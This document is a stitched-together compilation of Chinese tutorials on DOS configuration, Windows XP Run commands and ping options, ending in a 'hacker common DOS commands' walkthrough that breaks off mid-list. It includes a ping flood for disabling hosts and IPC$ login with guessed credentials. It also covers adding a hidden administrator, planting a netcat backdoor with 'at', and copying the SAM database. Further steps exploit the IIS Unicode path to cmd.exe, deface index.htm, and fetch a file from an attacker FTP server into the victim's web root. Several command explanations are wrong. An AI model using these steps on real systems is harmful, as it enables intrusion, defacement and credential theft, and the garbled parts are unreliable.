goto exit ->跳出 缺省为base_config,延迟时间5秒

:cced_config [common]

c:\dos\smartdrv.exe /l device=c:\dos\himem.sys

goto exit 各项都包含的共同部分

:exit ->结束 [base_config]

device=c:\dos\emm386.exe ram

dos=high,umb

[cced_config]

device=c:\dos\smartdrv.exe/double_buffer

include=base_config 包含base_config设置

可以根据计算机的在不同情况下的配置要求来选择.

十九、mscdex.exe 提供对光驱进行读写的程序

mscdex/d:drive [/D:drive][/e][/k][/s][/l:letter]

典型:config.sys 中device=c:\cdrom\cdrom.sys /d:mscd000

autoexec.bat中 c:\dos\mscdex /d:mscd000 /l:g

配置了一个光驱,符号为g

参数/d:drive1为光驱身份号,须与config.sys中的符号一致,可有多个

/d:mscd000 /d:mscd001

/e:使用扩展内存装入光驱驱动程序.

/s:使光驱在ms_net或windows是否设置为共享光驱

/V是否在加载时显示内存.

/L:letter 分配给光驱的盘符

/m:number 指定缓冲器的数目

应该注意的是:?如果用smartdrv.exe 加速对光驱的读写能力,应该在autoexec.

bat中将mscdex.?exe 写在smartdrv.exe 之前,smartdrv.exe的使用可大幅提高

对驱动器的读写能力.

二十、msd的使用

使用msd 可以整体检查计算机配置及系统信息

包括:?驱动器参数,计算机cpu参数,内存大小参数,显示器类型,串.并口情况,以

及各个IRQ占用情况,据此可以分析新增设备是否与原来设备有冲突.

同时也可以通过分析内存驻留程序,判断内存中是否有病毒,有则标为"???".

二十一、prompt dos提示符

$q 等于号 $t 当前时间 $d 当前日期 $p 当前驱动器符号

$$ $号提示 $n当前驱动器 $g 大于号 $l小于号 $b 显示"|"管道号

$h 隐去提示符 $E显示"<-"号

对于其它文字,则直接显示文本本身prompt ljw,则显示为ljw提示符

prompt 则仅显示当前驱动器号及大于号.

二十二、ramdrive.sys 使用内存当做虚拟盘来使用

应注意,所有数据都存在于内存中,应及时将其存到硬盘中,否则掉电后或者死机

后将丢失全部数据,优点是运行速度快,但不能在windows中使用.

示例:config.sys: device=c:\dos\ramdrive.sys /size[/e|a]

size为以k为单位的字节数,即建立的虚拟盘的大小.

/e或/a 都是使用扩展内存来建立虚拟盘,?加参数的前提是必须先加载内存管理

器himem.sys及emm386.exe.

二十三、subst 将一个驱动器与一个子目录联接

如:将对A:\l1\l2 子目录的请求映射为S盘,则输入

subst s: a:\l1\l2 即可

这样使用dir s:?等命令则显示的是a:\l1\l2子目录下的内容,其它 del 一样

可以用subst s: d 来取消这种映射.

可以用subst 来显示各种联接情况

注意:?可以采用subst a: c:a 来建立一个对于A的读写盘.对于某些安装软件

来说,?必须使用A盘来安装,就可以使用先将所要安装的软件全部拷贝到C:a子

目录中,然后输入subst a: c:a,再转到A:,就可以进行软件的安装了.

二十四、mem /c /m /p /d 常规内存显示程序

/c显示所有内存驻留程序的占用情况,分为conventional常规内存和uppermemory

高端内存占用,并显示总的占用情况(常规 高端 保留 扩展内存)

/p分页显示,页间暂停

/m后加模块名 如:/m msdos 显示dos系统内存的占用.

/d对常规 高端 保留 扩展内存加以详细例表说明

通过分析,可以看出内存占用是否合理,以及各种程序是否正常加载,从而在此基

础上使用内存优化工具memmaker进行各种管理,同时又可以分析出一些程序死机

的原因,若有的地方显示"???",则可以断定内存中有病毒的存在,有利于发现及消灭.

二十五、各种管道工具的使用"> < >> <<"

将各种命令造成的输出或所需要的输入重新定向

如:dir *.bat /b>p 可以将dir *.bat 例出的文件名输出到p文件中.

time<p>>p.bat

p文件中仅存在一个回车符,则可以将时间追加进p.bat文件中

"> >>" 是将命令产生的输出重新定向,比如到文件或打印机中.

>>产生的内容将追加进文件中,>则将原文件内容覆盖.

"< <<" 是将命令所需要输入的内容重新定向.

如:time<p 在批中可以是时间代码或回车符,可以以此改变时间.

需要说明的是 "prn "为打印机, "null"为空设备

con 为显示器

type p.bat>prn 可将p.bat打印出来.

null p 可将p文件删除掉

con p 可以在屏幕上编辑p文件,F6可以存盘退出

type p>pp 完成p文件到pp 的复制

type p|more 可在屏满时暂停显示

二十六、move 命令

move [y/-y] filename1 filename2

将文件1移动到文件2处

如:move c:\dos\*.* c:\cced

将dos子目录下的所有文件全部移动到cced 子目录下

/y|-y参数在目标目录不存在需要创建时,是否出现提示

可以使用该命令修改子目录名称,如 move dos cced

将dos目录名改为cced

二十七、append 指定一些特殊数据文件的存放位置,如user.dat pe2.pro等一些非*.

exe *.com *.bat 文件

格式:append [:]终止以前存在的指定目录 append 显示指定情况

append [path] append c:\user 等

二十八、

call 在一个批处理命令中调用另外一个批处理文件

(1)不终止现有文件的运行,执行完掉用程序后立即返回.

(2)被调用批处理命令必须以bat 为扩展名

(3)调用批处理文件时,可以加上参数(%1-%9)以及环境变量如%baud%

(4)不能使用管道工具及重定向工具

二十九、device devicehigh loadhigh

device 将指定的设备驱动程序装入内存中

devicehigh将指定的设备驱动程序装入高端内存中

loadhigh 将指定的设备驱动程序装入高端内存中

三十、defrag 优化磁盘

legend(传奇) optimize(优化) elapse(逝去) fragment(碎片)

该命令执行对指定的盘进行优化处理(包括检查文件分配表,各文件状态,纠正错

误),在执行时,可按照文件名大小,时间,扩展名对文件进行排序.

④ XP下的运行命令

开始-运行-命令大全
1. gpedit.msc-----组策略
2. sndrec32-------录音机
3. Nslookup-------IP地址侦测器
4. explorer-------打开资源管理器
5. logoff---------注销命令
6. tsshutdn-------60秒倒计时关机命令
7. lusrmgr.msc----本机用户和组
8. services.msc---本地服务设置
9. oobe/msoobe /a----检查XP是否激活
10. notepad--------打开记事本
11. cleanmgr-------垃圾整理
12. net start messenger----开始信使服务
13. compmgmt.msc---计算机管理
14. net stop messenger-----停止信使服务
15. conf-----------启动netmeeting
16. dvdplay--------DVD播放器
17. charmap--------启动字符映射表
18. diskmgmt.msc---磁盘管理实用程序
19. calc-----------启动计算器
20. dfrg.msc-------磁盘碎片整理程序
21. chkdsk.exe-----Chkdsk磁盘检查
22. devmgmt.msc--- 设备管理器
23. regsvr32 /u *.dll----停止dll文件运行
24. drwtsn32------ 系统医生
25. rononce -p ----15秒关机
26. dxdiag---------检查DirectX信息
27. regedt32-------注册表编辑器
28. Msconfig.exe---系统配置实用程序
29. rsop.msc-------组策略结果集
30. mem.exe--------显示内存使用情况
31. regedit.exe----注册表
32. winchat--------XP自带局域网聊天
33. progman--------程序管理器
34. winmsd---------系统信息
35. perfmon.msc----计算机性能监测程序
36. winver---------检查Windows版本
37. sfc /scannow-----扫描错误并复原
38. taskmgr-----任务管理器（2000／xp／2003
39. winver---------检查Windows版本
40. wmimgmt.msc----打开windows管理体系结构(WMI)
41. wupdmgr--------windows更新程序
42. wscript--------windows脚本宿主设置
43. write----------写字板
44. winmsd---------系统信息
45. wiaacmgr-------扫描仪和照相机向导
46. winchat--------XP自带局域网聊天
47. mem.exe--------显示内存使用情况
48. Msconfig.exe---系统配置实用程序
49. mplayer2-------简易widnows media player
50. mspaint--------画图板
51. mstsc----------远程桌面连接
52. mplayer2-------媒体播放机
53. magnify--------放大镜实用程序
54. mmc------------打开控制台
55. mobsync--------同步命令
56. dxdiag---------检查DirectX信息
57. drwtsn32------ 系统医生
58. devmgmt.msc--- 设备管理器
59. dfrg.msc-------磁盘碎片整理程序
60. diskmgmt.msc---磁盘管理实用程序
61. dcomcnfg-------打开系统组件服务
62. ddeshare-------打开DDE共享设置
63. dvdplay--------DVD播放器
64. net stop messenger-----停止信使服务
65. net start messenger----开始信使服务
66. notepad--------打开记事本
67. nslookup-------网络管理的工具向导
68. ntbackup-------系统备份和还原
69. narrator-------屏幕“讲述人”
70. ntmsmgr.msc----移动存储管理器
71. ntmsoprq.msc---移动存储管理员操作请求
72. netstat -an----(TC)命令检查接口
73. syncapp--------创建一个公文包
74. sysedit--------系统配置编辑器
75. sigverif-------文件签名验证程序
76. sndrec32-------录音机
77. shrpubw--------创建共享文件夹
78. secpol.msc-----本地安全策略
79. syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
80. services.msc---本地服务设置
81. Sndvol32-------音量控制程序
82. sfc.exe--------系统文件检查器
83. sfc /scannow---windows文件保护
84. tsshutdn-------60秒倒计时关机命令
85. tourstart------xp简介（安装完成后出现的漫游xp程序）
86. taskmgr--------任务管理器
87. eventvwr-------事件查看器
88. eudcedit-------造字程序
89. explorer-------打开资源管理器
90. packager-------对象包装程序
91. perfmon.msc----计算机性能监测程序
92. progman--------程序管理器
93. regedit.exe----注册表
94. rsop.msc-------组策略结果集
95. regedt32-------注册表编辑器
96. rononce -p ----15秒关机
97. regsvr32 /u *.dll----停止dll文件运行
98. regsvr32 /u zipfldr.dll------取消ZIP支持
99. cmd.exe--------CMD命令提示符
100. chkdsk.exe-----Chkdsk磁盘检查
101. certmgr.msc----证书管理实用程序
102. calc-----------启动计算器
103. charmap--------启动字符映射表
104. cliconfg-------SQL SERVER 客户端网络实用程序
105. Clipbrd--------剪贴板查看器
106. conf-----------启动netmeeting
107. compmgmt.msc---计算机管理
108. cleanmgr-------垃圾整理
109. ciadv.msc------索引服务程序
110. osk------------打开屏幕键盘
111. odbcad32-------ODBC数据源管理器
112. oobe/msoobe /a----检查XP是否激活
113. lusrmgr.msc----本机用户和组
114. logoff---------注销命令
115. iexpress-------木马捆绑工具，系统自带
116. Nslookup-------IP地址侦测器
117. fsmgmt.msc-----共享文件夹管理器
118. utilman--------辅助工具管理器

Windows下Ping命令详解

ping只有在安装了TCP/IP协议以后才可以使用：
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s
count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主机，直到你按下Control-C。
此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。

-a Resolve addresses to hostnames.
解析计算机NetBios名。
示例：C:＼>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

-n count Number of echo requests to send.
发送count指定的Echo数据包数。
在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知：
C:＼>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。

-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，

因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍

带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负）

C:＼>ping -l 65500 -t 192.168.1.21

Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。

-f Set Don't Fragment flag in packet.
在数据包中发送“不要分段”标志。
在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。

-i TTL Time To Live.
指定TTL值在对方的系统里停留的时间。
此参数同样是帮助你检查网络运转情况的。

-v TOS Type Of Service.
将“服务类型”字段设置为 tos 指定的值。

-r count Record route for count hops.
在“记录路由”字段中记录传出和返回数据包的路由。
在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过限制在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其他命令实现，我将在以后的文章中给大家讲解。以下为示例：
C:＼>ping -n 1 -r 9 202.96.105.101 （发送一个数据包，最多记录9个路由）

Pinging 202.96.105.101 with 32 bytes of data:

Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90

Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ，202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。

-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。

-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量为 9。

-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量为 9。

-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔，单位为毫秒。
此参数没有什么其他技巧。

ping命令的其他技巧：在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然TTL的值在对方的主机里是可以修改的，Windows系列的系统可以通过修改注册表以下键值实现：
[HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Services＼Tcpip＼Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
正常情况下，当我们使用Ping命令来查找问题所在或检验网络运行情况时，我们需要使用许多Ping命令，如果所有都运行正确，我们就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：

•ping 127.0.0.1
这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

•ping 本机IP
这个命令被送到我们计算机所配置的IP地址，我们的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

•ping 局域网内其他IP
这个命令应该离开我们的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

•ping 网关IP
这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

•ping 远程IP
如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

•ping localhost
localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

•ping www.xxx.com（如www.yesky.com 天极网）
对这个域名执行Ping www.xxx.com 地址，通常是通过DNS 服务器 如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：我们也可以利用该命令实现域名对IP地址的转换功能。

如果上面所列出的所有Ping命令都能正常运行，那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示我们所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

⑤ windows运行命令

打开控制面板control

计算机管理compmgmt.msc

注销命令logoff

注册表regedit

系统加密（一旦加密就不能解开，保护windowsxp系统的双重密码）syskey

任务管理器taskmgr

自动更新wuaucpl.cpl

开机启动项msconfig

windows使用运行命令打开开机启动项步骤：

1、点击windows+R快捷键调出windows运行界面。

⑥ 谁有DOS命令的解释哦.

ATTRIB 文件属性（显示或改变属性）
CHDIR(CD) 改变目录
CHKDSK 检查磁盘
CHOICE 提示击键输入
CLS 清屏幕
COMMAND 重新加载MS-DOS程序
COPY 复制文件
DATE 设置显示日期
DEBUG 调试程序
DEFRAG 清除磁盘碎片
DEL(ERASE) 删除文件
DELOLDOS 删除旧DOS文件
DELTREE 删除目录树分支
DIR 显示目录
DISKCOMP 比较软盘内容
DISKCOPY 复制磁盘
DOS 扩展扩充内存管理
DOSSHELL DOS外层
DRIVPARM 定义驱动器参数
EDIT 编辑器
EMM386 内存管理
ERASE 删除文件
DBLSPACE 磁盘压缩
EXPAND 释放压缩
FASTHELP 快速求助
FC 文件比较
FDISK 磁盘分区
FIND 搜寻指定字串
FOR 循环执行命令
FORMAT 格式化磁盘
MEM 内存使用情况显示
MKDIR(MD) 建立子目录
MSAV 检查和清除病毒
MSBACKUP 磁盘文件务份
PATH 设置搜索路径
PAUSE 暂停执行命令
RESTORE 磁盘文件转储
RENAME(REN) 文件重新命名
RMDIR(RD) 删除目录
SCANDISK 检查磁盘
SYS 传送系统文件
TIME 设置显示时间
TREE 显示目录结构
TYPE 显示文件内容
UNDELETE 恢复被删除文件
VER 显示系统版本号
VOL 显示卷标
VSAFE 病毒检查
XCOPY 复制组文件
APPEND 补充路径
BREAK 检查控制中断
BUFFERS 设置磁盘缓冲区数
CALL 调用批文件
CHCP 转换码页
COUNTRY 确定国家标准货币
CTTY 改变控制台
DEVICE 安装设备驱动程序
DEVICEHIGH 装载设备驱动程序
ECHO 命令显示开关
FASTOPEN 快速加载文件
FCBS 使用文件控制块
FILES 同时打开文件数
GOTO 转向分支
GRAPHICS 图形屏幕打印
HELP 求助
IF 设定条件
INCLUDE 简化多重配置块
INSTALL 安装常驻程序
INTERLNK 计算机互连
INTERSVR 与服务器互连
KEYB 装载字符转换表
LABEL 卷标
LASTDRIVE 置最大驱动器数
LOADFIX 装入固定内存
LOADHIGH(LH) 高内存程序装载
MEMMAKER 检查内存
MENUCOLOR 设置显示选项
MODE 设置硬件工作方式
MSCDEX 访问CD驱动器
MSO 检查系统配置
NLSFUNC 支持各国语言
NUMLOCK 控制NUMLOCK键
POWER 节省电能
PRINT 后台打印
PROMPT 改变系统提示
QBASIC 启动QB
REM 注释信息
REPLACE 替换文件
SET 设置环境变量
SETUP 安装DOS6。2文件
SETVER 改变DOS版本表
SHARE 网络文件共享
SHELL 装载命令处理程序
SMARTDRV 磁盘缓冲
SORT 文件排序
STACKS 支持动态使用的数据线
SUBMENU 菜单项（配置CONFIG。SYS）
SUBST 设置虚拟驱动器
SWITCHES 键盘开关
VRIFY 磁盘检验

》：建立子目录命令 MD （内部命令）
功能：在指定盘的指定目录下建立一个子目录
格式：MD [盘符][路径]子目录名
注意：1。不能建立根目录与目标目录下已经存在的目录
2。缺省路径时则表示在当前目录下建立
2》：改变当前目录目录命令： CD （内部命令）
功能：设置指定盘的当前目录
格式：CD [盘符][路径]
注意：CD 表示显示当前目录
CD..表示退回到根目录
CD/ 表示退回到上一级目录
3》：删除子目录命令：RD （内部命令）
功能： 从指定的盘符上删除子目录
格式： CD [盘符][路径]子目录名
注意：1。要删除的目录必须为空目录，如果不为空目录，先来到该目录，用 DEL *.*删除该目录下的所有内容
再回到上一级目录，用RD命令删除该目录
2。不能删除当前目录与根目录
4》：列文件目录命令：DIR （内部命令）
功能：显示指定盘、指定目录下所包含的文件与下一级子目录的有关信息
格式：DIR [盘符][路径][文件名][/P][/W]
[/P]表示分屏显示
[/W]表示压缩显示
5》：显示全盘目录命令：TREE （外部命令）
功能：显示指定盘的目录结构
格式：[盘符][路径]TREE [盘符1][/F]
[/F]表示列出各级子目录的文件名
6》：设置查找目标命令PATH （内部命令）
功能：设置外部文件的查找目录
格式： PATH [盘符][路径][；盘符][路径]……
注意：1。显示上次PATH命令设置的查找文件目录命令用：
PATH
2。删除上次PATH命令设置的文件查找目录用：
PATH；
7》：删除目录命令：DELTREE
功能：将整个目录及其子目录和文件全部删除
格式：DELLTREE [盘符][路径]目标文件
注意：全部删除、不论是否系统、隐藏、还是只读

黑客常用dos命令（转）
一般黑客入侵所需要的几个常用命令

1：NET

只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！

这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1

net use \\127.0.0.1\ipc$ "123456" /user:"hbx"

退出的命令是

net use \\127.0.0.1\ipc$ /delte

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

----------------------

下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.

我们加一个hei的用户密码为lovechina

net user hei lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators hei /add

----------------------

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

这样可以打开对方的TELNET服务.

----------------------

这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

net user guest /active:yes

----------------------

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

net user guest lovechina

net命令果然强大啊！

2:at

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？

那么需要用AT命令，这里假设你已经登陆了那个服务器。

你首先要得到对方的时间，

net time \\127.0.0.1

将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个www.51.NET,不错的.当我们申请完后，它会给用户名,密码,以及FTP服务器.

在上传前需要登陆先，这里我们假设FTP服务器是www.51.NET,用户名是HUCJS,密码是654321

ftp www.51.net

他会要求输入用户,成功后会要求输入密码.

----------------------

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\

get c:\index.htm d:\

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

put c:\index.htm d:\

5:

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要复制到D盘下把C改为D，就行了！

index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他复制到WINNT目录里

就要把输入

index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

----------------------

要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

\\127.0.0.1\admin$\repair\sam._ c:\

----------------------

6：set

如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！

下面是我得到的结果！我来分析它，只是找主页在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。

7：nbtstat

如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！

现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。

这里的用户是PENTIUMII。

8：Shutdown

关了对方的NT服务器的命令

Shutdown \\IP地址 t:20

20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。

9：DIR

这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10：echo

着名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“反独裁，反一党制！”写入index.htm，有2种方法，大家看看有什么区别。

echo 反独裁，反一党制！>index.htm

echo 反独裁，反一党制！>>index.htm

第一个的意思是覆盖index.htm原有的内容，把“反独裁，反一党制！”写进index.htm。

第二个的意思是把“反独裁，反一党制！”加到index.htm里面。

“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。

1、首先，我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。）
open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的）
cnhack（你申请时的用户名）
test（你申请时的密码）
get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）
bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）

具体的做法：
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）

等命令完成时，文件已经下载到你指定的文件里了。

注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。）

记得要 del c:\cnhack.txt

11:attrib

